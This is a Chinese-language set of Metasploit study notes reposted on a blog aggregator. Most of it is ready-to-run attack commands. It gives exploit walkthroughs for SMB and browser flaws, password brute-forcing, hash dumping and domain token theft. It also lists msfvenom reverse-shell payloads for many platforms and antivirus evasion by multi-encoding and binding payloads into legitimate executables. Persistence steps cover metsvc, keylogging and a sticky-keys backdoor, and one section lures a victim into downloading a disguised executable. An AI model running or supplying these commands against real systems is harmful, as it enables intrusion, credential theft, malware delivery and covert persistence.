msf学习笔记

这篇具有很好参考价值的文章主要介绍了msf学习笔记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

渗透工具使用指南

·  序言

·  ·  信息收集工具

·  ·  漏洞扫描(分析)

·  抓包改包

·  Burpsuite

·  ·  Fiddler

  • ·  ·  Wireshark

·  漏洞利用

·  Hydra

·  ·  Metasploit

·  ·  SQLmap

·  ·  Beef

·  ·  antSword

  • · 
    • xss在线工具

本文档使用 看云 构建

Metasploit

metasploit体系如下:

基础库文件(Libraris):提供了核心框架和一些基础功能的支持

模块(Modules):实现渗透测试功能的主体代码

插件(Plugins):将外部的集成工具集成到框架中

用户接口(Interface)和功能程序(Utilities):集成模块与插件的渗透测试功能

1.基础库文件

位于源码根目录下的libraries目录中。

Rex:基础组件网络套接字,网络应用协议客户端与服务端实现、日志子系统、渗透攻击例程、数据库支持

core负责实现与各种类型的上层模块及插件的交互接口

base库扩展了core,提供更简单的包装例程支持用户接口与功能程序调用框架功能及集成模块

2.模块

辅助模块(Aux):网络服务的扫描查点、口令猜解、敏感信息嗅探、Fuzz测试发掘漏洞、网络协议欺骗

渗透攻击模块(Exploits)

后渗透攻击模块(Post)

攻击载荷模块(Payloads)

空指令模块(Nops)

编码器模块(Encoders)

3.插件

将Nmap、Neuss等功能集成到metasploit中

4.接口

msfconsle控制台终端

msfcli命令行

msfgui图形化界面

armitage图形化界面

msfapi远程调用接口

5.功能程序

一系列可以直接运行的程序功能,支持安全研究员快速的利用Metasploit框架内部能力完成一些特定功能

console的使用

service postgresql start //先连接数据库

msfconsole  //打开框架

msf>help  //显示msf所支持的命令列表

msf>db_status[lc1]   //查看是否成功连接数据库

msf>help search  //显示关于search参数的命令和使用

msf学习笔记,网络安全,安全

msf>workspace  //当前工作区

msf6 > workspace -h  //帮助

msf6 > workspace -a lcy  //新增工作区lcy

实例入侵metasploitable靶机

1.search samba搜索模块

2.use multi/samba/usermap_script 使用模块

3.show payloads查看可用的载荷

4.set payload cmd/unix/bind_netcat  使用载荷

5.show options  选择载荷可用选项

6.set RHOST 192.168.0.94  设置载荷的攻击目标IP

7.exploit执行渗透攻击

然后攻击成功会建立一个会话,返回一个可交互的shell

这就是使用metasploit渗透的一个常规流程

网络服务渗透攻击面

Windows平台根据网络服务攻击面的类别来分,可分为三大类

1.针对Windows系统自带网络服务的渗透攻击

NetBios:UDP137、138、TCP139,MS03-034

SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、

MS08-067 RDP(远程桌面):TCP3389,MS12-020

2.针对Windows系统上微软网络服务的渗透攻击

IIS,MS08-062、MS09-053、MS10-040 MS SQL xp_cmdshell DNS,MS07-029

3.针对Windows系统上第三方网络服务的渗透攻击

Apache Tomcat  MYSQL  用Exploit利器mona.py绕过Windows 7下的DEP+ASLR安全组合。 经典案例漏洞,MS06-040,MS07-029,MS08-067、MS11-058、MS12-020

如何使用攻击载荷模块

1.查看载荷信息

info windows/exec  //假设要查看这个载荷的信息

2.管理攻击载荷模块的

Shellcode msfpayload windows/exec CMD=dir C //导出成C语言数组的完整Shellcode。

3.查看Shellcode汇编代码

msfpayload windows/exec CMD=dir R | ndisasm -u

升级和更新

获取新的攻击代码。

进入框架目录更新

cd /usr/share/metasploit-framework/./msfupdate

端口扫描

一、调用nmap扫描

db_nmap -PA -PS[lc2]  192.168.198.0/24 

msf学习笔记,网络安全,安全

msf6 > hosts //查看在线主机

os_name  os_flavor[lc3]   os_sp  purpose  info  comments

msf学习笔记,网络安全,安全

-T 【0-5】:默认为T3 ,T4表示最大TCP扫描延迟是10ms

-sS:TCP SYN

-sA:TCP ACK

-A:打开操作系统和版本探测

--script=vuln  :检查是否有常见漏洞

db_nmap  --script=vuln 192.168.198.1[lc4] 

msf学习笔记,网络安全,安全

msf6 > search ms10-061

msf6 > info exploit/windows/smb/ms10_061_spoolss  //查看模块详细信息

msf学习笔记,网络安全,安全

使用这个模块:

use 0

查看选项:options

msf学习笔记,网络安全,安全

payload是攻击载荷设置

set rhosts 192.168.198.1

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.198.5   //设置具体选项

show targets //查看目标机器,一般使用默认id就行,直接run

run   //开始扫描,运行

sessions   //查看会话状态

background  //当前session挂起

session -l  //查看所有session

session -i id  //进入session

back 回退

msf学习笔记,网络安全,安全

save  将当前设置保存下来,一边下次启用msf时仍可以使用。

session -u id  //将session 转换为meterpreter渗透工具

二、MSF扫描模块--use auxiliary/scanner/portscan/syn

search portscan  //搜索端口扫描模块

use auxiliary/scanner/portscan/syn  //使用syn扫描模块

show options  //显示模块可操作选项

set ....  //设置具体选项

run  //开始扫描,运行

upload /usr/shre/windows/nc.exe C:\\windows\\system32    //上传文件

execute -H[lc5]  -i -f cmd.exe

三、SMB扫描获取系统信息

use auxiliary/scanner/smb/smb_version

show optionsset RHOSTS 192.168.1-200

//可以设置单个IP或者范围set THREADS 10 //设置线程

服务识别

SSH

use auxiliary/scanner/ssh/ssh_version

show optionsset RHOSTS 192.168.0.10

//设置多个ip 192.168.0.11 192.168.0.55run

FTP

use auxiliary/scanner/ftp/ftp_versionset RHOSTS *run

密码嗅探

use auxiliary/sniffer/psnufflerun //可以嗅探FTP

SNMP扫描与枚举

search SNMP

use auxiliary/scanner/snmp/snmp_login

show options

set RHOSTS *

枚举

use auxiliary/scanner/snmp/snmp_enumset RHOST *

set THREADS 10

run

SMB登录验证

use auxiliary/scanner/smb/smb_lo

show options

set RHOSTS *

set SMBuser  administrator

set THREADS 10

run

VNC身份认证

use auxiliary/scanner/vnc/vnc_none_auth

show options

set RHOSTS *

set THREADS 50

run

WMAP(轻量级测试工具,检测常见的Web漏洞)

service postgresql start //先启动数据库

msfconsole //再启动msf

db_status  //msf下输入,查看数据库状态 msfdb init可以初始化数据库

load wmap  //载入wmap

wmap_targets -h  //查看帮助

wmap_sites -a http://www.51xkx.cn //添加URL

wmap_sites -l  //查看配置的URL

wmap_targets -t http://121.42.88.105  //添加url对应的IP

wmap_targets -l //查看是否写入成功

wmap_run -h  //查看运行选项

wmap_run -t //选择运行方式,加载

wmap_run -e //开始测试

wmap_vulns -l //扫描完成后查看结果

远程代码执行

search 08-067  (Win 2003、xp)

use exploit/windows/smb/ms08_067_netapi

show options

set RHOST *

show payloads //查看可用攻击载荷

set payload windows/meterpreter/reverse_tcp

show optionsset LHOST *  // 设置本机IP,如果是攻击外网,本身必须是外网ip

info 或者show targets //查看系统版本信息

set target 17 //设置目标版本信息 (只有08-067不能自动识别版本号,其他的可以自动获取)

show options //检查设置

exploit //开始攻击

shell //获取目标cmd-shell

MIDI文件解析远程代码执行

影响范围win2003、winxp、win7

search 12-004

use exploit /windows/browser/ms12_004_midi

show options

set SRVHOST * //设置本机IP

set URIPATH /  //把网址后缀改成'/'

exploit //start exploit

sessions //查看会话

sessions -i 1 //连接会话

shell //连接shell

口令安全

search mysql_login //搜索mysql登录破解利用模块,ssh等可以登陆的也行

use auxiliary/scanner/mysql/mysql_login

show options

set RHOSTS 127.0.0.1*

set USERNAME root

set PASS_FILE /root/1.txt

set THREADS 50

exploit

Hash值传递渗透

1.在不知道密码的情况下

获得meterprete后

meterpreter>hashdumpset smbpass 获取到的hash值

2.在知道密码的情况下

直接登录就行

NDProxy内核提权

获取meterpreter情况下,权限小,用这个洞来提升权限

search 14-002

use exploit/windows/local/ms_ndproxy

show options

set session 1 //选择会话

exploit

getuid //查看当前权限

getsystem //这个命令也可以用来提取

多种后门生成msfvenom

msfvenom是用来生成后门的软件,在本地监听上线

msfvenom 是msfpayload和msfencode的结合

参数:

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

msf学习笔记,网络安全,安全

-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, –nopsled < length> 为payload预先指定一个NOP滑动长度

-f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64

–platform < platform> 指定payload的目标平台

-s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小

-b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 \'\x0f\'、\'\x00\';

-i, –iterations < count> 指定payload的编码次数

-c, –add-code < path> 指定一个附加的win32 shellcode文件

-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, –out < path> 指定创建好的payload的存放位置

-v, –var-name < name> 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

-h, –help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

比如想查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用

msfvenom -p windows/meterpreter/reverse_tcp --list-options

 使用msfvenom --list payloads可查看所有payloads

 使用msfvenom --list encoders可查看所有编码器

metasploit可以生成多钟后门

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe

Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.js

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.py

perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb

lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua

windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

———————----------------------------

完整过程

msfpayload windows/meterpreter/reverse_tcp LHOST=本地ip  LPORT=1234 x >123.exe      

//生成windows后门攻击载荷

ls //查看生成后门所在当前文件夹在

msf监听

search handler

use exploit/multi/handler

show options

set payload windows/meterpreter/reverse_tcp

set LHOST *

set LPORT 1234

exploit

目标运行后门后,会反弹shell

内网渗透

获得shell之后需要对C段进行一次扫描

meterpreter>run get_local_subnets //获取网卡

run autoroute -s 192.168.48.0/24  //扫描整个C段

在shell中执行,net view 查看域

若有域控在meterpreter劫持它的域管理

use incognito  //调用模块

list_tokens -u //查看它都有什么域

impersonate_token 域管理

shell //获得域管理的shell

如果没有域管理

use auxiliary/sniffer/psnufflerun  //嗅探登录密码 FTP

免杀payload

免杀例子

加壳、改壳、花指令、源码免杀、改特征码

首先还是先生成一个后门

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode -e x86

/shikata_ga_nai -t exe >123.exe

//可以多种编码效果更好

msfencode -l //查看有多少可用编码

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode -e

x86/shikata_ga_nai -c 8 -t raw | msfencode -e x86/countdown -c 6 -t exe -o /666.exe

//多次编码

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode

 -t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20

//绑定正常的文件

多种编码+多次编码+绑定正常的可执行程序

玩转不一样的XSS

search keylogger  //搜索相关模块

use ....javascript_keylogger 那个模块

show options

set DEMO true //启用官方的DEMO

set URIPATH  /   //伪装url

set srvport 80 //设置服务端口80

run

类似钓鱼网站,记录键盘,感觉没什么卵用

维持访问(种植后门)

meterpreter>run metsvc -A / /种植后门

msf>use exploit/multi/handler

set payload windows/metsvc_bind_tcp

show options

set LPORT 生成后门的端口

set RHOST *

exploit

主动连接到shell,在服务器上才行

第二种方法,键盘记录后门

meterpreter>keyscan_start  //开启键盘记录

meterpreter>keyscan_dump //查看键盘记录结果

第三种shift后门

meterpreter>shell

CD C:\windows\system32

cacls sethc.exe /t /e /G Administrators:f

cacls cmd.exe /t /e /G Administrators:f

ren sethc.exe aaa.exe

ren cmd.exe sethc.exe

使用Metasploit创建反向shell

1.首先创建反向shell
msfvenon -p windows/meterpreter/reverse_tcp LHOST=192.168.0.100
LPORT=4443 -f exe > cute_dolphin.exe
2.创建监听连接器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.100 set lport 4443
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
3.kali已经准备就绪,启动Apache程序 service apache2 start
4.然后将恶意文件复制到Web服务器文件夹内
cp cute_dolphin.exe /var/www/html/
5.引诱受害者访问我们的陷阱
http://192.168.0.100/cute_dolphine.exe
6.查看活动连接 sessions
7.如果打算和会话交互,可以使用-i选项
sessions -i 1
8.我们会看到meterpreter连接
可以查看被入侵的系统信息 sysinfo
或者执行系统shell shell

上一篇:Hydra下一篇:SQLmap


 [lc1]msf6 > db_status

[*] postgresql selected, no connection

数据库没连接上,首先退出msfconsole命令状态

msfdb reinit

msfdb start

然后进入msfconsole,重新连接就好了。

 [lc2]-PA:TCP ACK PING 扫描

-PS: TCP SYN PING 扫描

-PR: ARP扫描是namp 对目标进行arp ping 扫描,防火墙不会禁用arp请求

 [lc3]os_flavor(操作系统版本):

os_sp(操作系统服务包):指操作系统所安装的服务包或补丁的版本号。

purpose(用途):描述设备或系统的用途或功能,例如"Web服务器"、"数据库服务器"等。

info(信息):

comment(备注)

 [lc4]|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR:这是Nmap执行的SMB漏洞扫描脚本的结果。SMB是一种用于文件和打印共享的协议,该扫描尝试检测主机上是否存在MS10-061漏洞。然而,由于无法建立SMB连接或接收数据字节,脚本未能成功执行。

 [lc5]-H: 不可见方式执行

-i: 交互方式

-f: 指定要执行的文件文章来源地址https://www.toymoban.com/news/detail-832111.html

到了这里,关于msf学习笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全(黑客)学习笔记

    0基础学网安或者提升巩固网安技术的小伙伴有福了! 本篇整合了网络安全全知识点,零基础也适用! 本篇涵盖内容及其全面,强烈推荐收藏! 1、学习基础内容多时间长 2、难以坚持容易自我怀疑 3、学习重点难以分清 4、学习知识点不够系统 5、遇到问题很难独自解决 6、实

    2024年02月16日
    浏览(35)
  • 《网络安全概论》—学习笔记

    网络(信息)安全的基本目标: 保密性 :确保信息不被泄露。 完整性 :确保数据一致性,防止未经授权修改数据。 可用性 :确保合法用户正常访问和使用资源。 合法使用 :确保资源不被非法或非授权用户使用。 安全威胁主要分为三类: 基本威胁 主要的可实现威胁 潜在

    2024年02月10日
    浏览(46)
  • 网络安全—信息安全—黑客技术(学习笔记)

    网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有

    2024年02月16日
    浏览(45)
  • Web 学习笔记 - 网络安全

    目录 m前言 正文 XSS 攻击 简单示例 XSS 防御 CSRF  Web 安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。 网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到 SQL 注入,再到复杂的网络劫持等,

    2023年04月24日
    浏览(49)
  • 网络安全法学习笔记

    《中华人民共和国网络安全法》于 2016年11月7日 第十二届全国人民代表大会常务委员会第二十四次会议通过, 2017年6月1日 起施行,总共7章79条, 主要内容:概述立法目的和适用范围,及国家总体方针 第1条            为了 保障网络安全 , 维护 网络空间主权和 国家安全

    2024年02月08日
    浏览(116)
  • 网络安全—0基础学习笔记(黑客)

    1.这是一条坚持的道路,三分钟的热情可以放弃往下看了.  2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可以先放放,以后再来解决. 首先,

    2024年02月10日
    浏览(44)
  • 网络安全—黑客技术(学习笔记)

    网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 一、是市场需求量高; 二、则是发展相对成熟入门比较容易。 需要掌握的知识点偏多(举例): 外围打

    2024年02月11日
    浏览(52)
  • 黑客技术(网络安全)学习笔记

    了解了计算机的硬件、软件、操作系统和网络结构等基础知识,可以帮助您更好地理解网络安全的概念和技术。 了解了网络的结构、协议、服务和安全问题,可以帮助您更好地解决网络安全的原理和技术。 了解了安全的概念、原则、威吓和攻击方式,可以帮助您更好地理解

    2024年02月14日
    浏览(40)
  • 网络安全学习笔记——蓝队实战攻防

    目录 蓝队及发展趋势         基本概念 ​​​        发展趋势 攻击阶段         准备阶段         情报搜集         建立据点         横向移动 攻击战术         利用弱口令及通用口令         利用互联网边界渗透内网         利用通用产

    2024年02月10日
    浏览(100)
  • 网络安全(黑客)自学笔记&学习路线

     谈起黑客,可能各位都会想到:盗号,其实不尽然;黑客是一群喜爱研究技术的群体,在黑客圈中,一般分为三大圈: 娱乐圈 技术圈 职业圈 。   娱乐圈: 主要是初中生和高中生较多,玩网恋,人气,空间,建站收徒玩赚钱,技术高的也是有的,只是很少见。    技术圈

    2024年02月09日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包